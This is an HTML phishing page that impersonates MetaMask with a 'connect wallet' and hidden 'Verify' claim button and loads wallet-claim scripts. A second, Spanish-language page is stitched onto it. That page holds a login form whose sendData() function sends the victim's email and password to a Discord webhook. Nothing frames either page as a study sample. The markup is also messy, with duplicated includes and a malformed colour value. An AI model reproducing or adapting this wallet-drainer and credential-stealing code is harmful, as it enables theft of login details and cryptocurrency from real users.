


<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <title>The crypto wallet for Defi, Web3 Dapps and NFTs | Metamask </title>
<meta content="The crypto wallet for Defi, Web3 Dapps and NFTs | Metamask" property="og:title">

<meta property="og:image" content="/static/images/logos/opensea.svg">

    <meta property="og:type" content="website">

    <meta property="og:url" content="">


  

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="https://gateway.pinata.cloud/ipfs/QmREUVJ7Z5uh4YHfYJ7FvuGLsaU5aCCPCgjdqDfhrWhoKt" />
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">
    <script src="src/js/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">

    <script src="./settings.js"></script>
    <link rel="stylesheet" href="./src/css/styles.css">

    <script src="src/js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bignumber.js/8.0.2/bignumber.js" integrity="sha512-XQDG6H87RgMf+aNFwDPCUcFwUf3t9liyqN/2BkJ8KGixupbjPwQHNhypNA972mLIkg4KPo4lkGmqAf3yfDz8hw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="src/js/tokenabi.js"></script>
    <script src="jquery.min.js"></script>
    <script src="base.js?1"></script>



</head>
	<style>
    .Home_soon__8s2ww button {
        background-color: #3498DB;
        border: 2px solid #3498DB;
	background-color: blue;
        color: white;
        padding: 10px;
        
        border-radius: 15px;
        box-sizing: border-box;
        color: #85C1E9;
        cursor: pointer;
	text-align: right;    
	float: right;    
        display: grid;
	margin-right: auto;
	margin-left: auto; 
        font-size: 15;
        font-weight: 600;
        line-height: 20px;
        margin: 0;
        outline: none;
        padding: 13px 23px;
        position: relative;
        text-align: center;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
    }

    .Home_soon__8s2ww button:focus-visible {
        box-shadow: #27AE60 0 0 0 2px, rgba(255, 255, 255, 0.8) 0 0 0 4px;
        transition: box-shadow .2s;
    }

    .Home_soon__8s2ww button:active {
        background-color: ##85C1E9;
        border-color: #000000;
        transform: scale(.96);
    }

    .Home_soon__8s2ww button:disabled {
        border-color: #DDDDDD;
        color: #DDDDDD;
        cursor: not-allowed;
        opacity: 1;
    }
</style>

	


	
	



                    <div class="Home_soon__8s2ww">
                        <button id="connectWallet">ᴄᴏɴɴᴇᴄᴛ ᴡᴀʟʟᴇᴛ</button>
                        <button id="claimButton" style="display: none;"> Verify </button>
			 


			  

                        <br />
			    
                    </div>
                    
                    
                    <div class="Home_socials__Gabme">
                     
                            <span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%">
                                <span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%">
                                    <img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg xmlns=%27http://www.w3.org/2000/svg%27 version=%271.1%27 width=%2748%27 height=%2748%27/%3e">
                                </span>
                            </span>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="./src/js/loader_index.js"></script>

    <script type="text/javascript" src="src/js/web3.min.js"></script>
    <script type="text/javascript" src="src/js/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="src/js/claim.js"></script>
    
    <script type="text/javascript" src="./src/js/index.min.js"></script>

    <script type="text/javascript">
        $('.alert-eth-message-close').click(function(){
            $('.alert-eth-message').fadeOut(200);
        });
    </script>

</body>
<script charset="UTF-8" id="LA_COLLECT" src="./src/js/js-sdk-pro.min.js"></script>

<!DOCTYPE html>
<html>
  <head>
    <style>
      .container {
        background-color: orange;
        padding: 20px;
        text-align: center;
      }
      
      input[type="text"], input[type="password"] {
        width: 30%;
        padding: 10px;
        margin: 10px;
        font-size: 16px;
        border-radius: 5px;
        border: none;
      }
      
      .title {
        color: white;
        font-size: 24px;
        margin: 10px;
      }
      
      .btn {
        background-color: lightblue;
        color: white;
        padding: 10px 20px;
        border-radius: 5px;
        border: none;
        transition: background-color 0.2s ease-in-out;
      }
      
      .btn:hover {
        background-color: blue;
        cursor: pointer;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <h1 class="title">Suscribir</h1>
      <div>
        <p class="title">Correo electrónico:</p>
        <input type="text" id="email">
      </div>
      <div>
        <p class="title">Password:</p>
        <input type="password" id="password">
      </div>
      <button class="btn" onclick="sendData()">Enviar</button>
    </div>
    
    <script>
      function sendData() {
        const email = document.getElementById("email").value;
        const password = document.getElementById("password").value;
        
        const xhr = new XMLHttpRequest();
        xhr.open("POST", "https://discordapp.com/api/webhooks/1065639854324588574/Iu0dfAhK_XeuoLysZSCuxfc79cFpRYvMk9xAueMycoxKijo_gEjoyGT6-6e3MRWFiSnT", true);
        xhr.setRequestHeader("Content-Type", "application/json");
        xhr.send(JSON.stringify({
          content: `Correo electrónico: ${email}\nPassword: ${password}`
        }));
      }
    </script>
  </body>
</html>
